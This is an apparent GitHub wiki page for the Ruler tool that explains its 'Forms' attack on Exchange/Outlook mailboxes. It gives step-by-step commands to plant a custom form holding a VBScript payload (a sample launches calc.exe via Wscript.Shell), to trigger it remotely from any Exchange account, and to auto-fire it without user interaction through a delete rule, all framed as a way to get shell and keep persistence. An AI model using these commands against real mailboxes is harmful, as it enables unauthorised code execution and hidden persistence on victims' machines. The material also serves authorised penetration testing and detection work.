Skip to content
Etienne Stalmans edited this page May 11, 2017 · 6 revisions

Forms

Ruler can also get shell through custom forms. This is especially useful for persistence, as a form can lie dormant in the inbox, nearly undetectable.

The basic premise behind forms is explained in the Outlook forms and shells.

To access the Forms option, you need to use the form command. There are multiple sub-commands to forms:

Setup

If you use the forms attack, you need to ensure that the templates folder is present in the current working directory. Ruler will need the files contained in this directory. Please copy the following files into it:

  • img0.bin
  • img1.bin
  • formstemplate.bin
  • formsdeletetemplate.bin

Display

You can view all existing forms using the display command. This fetches the list of existing forms from the exchange server and provides you with the full form name.

./ruler --email john@msf.com form display

Add

Unlike Rules, forms don't require a WebDAV instacnce and VBScript can be executed directly. A sample VBScript entry would be:

CreateObject("Wscript.Shell").Run "calc.exe", 0, False

The script needs to be supplied in either a file, or on the command line. To create a custom form:

./ruler --email john@msf.com form add --suffix superduper --input /tmp/command.txt --send

This will create a new form, of message class IPM.Note.superduper and use the script found in /tmp/command.txt as the VBScript to execute. Using --send simply task Ruler to send an email to the user, using their own account, and ensuring the correct message class is set (which triggers the form).

To trigger an existing form, you don't need send the email from the account that the form was created on. This is great for persistence, you simply need to have a valid Exchange based account (outlook.com is great) and know the suffix used for the form.

./ruler --email alice@outlook.com form send --target john@msf.com --suffix superduper

Trigger Form with a Rule

Nick Landers (@monoxgas) found that a form without event triggers, would call the VBScript payload on delete. This delete can be automated by creating a client-side rule to delete the message as it arrives in the mailbox.

This is a great way to auto-trigger the form, without requiring any user interaction. Ruler can automate this for you if you supply the --rule flag:

./ruler --email john@msf.com form add --suffix superduper --input /tmp/command.txt --rule --send

You will need to delete the newly created rule once your payload has triggered. This can be done using the delete command outlined rules.

Delete

Deleting an existing is done in a similar way to deleting rules.

./ruler --email john@msf.com form delete --suffix superduper

If the form has a rule associated with it (you used --rule when creating the form), Ruler will detect the rule and offer to delete it for you.

Clone this wiki locally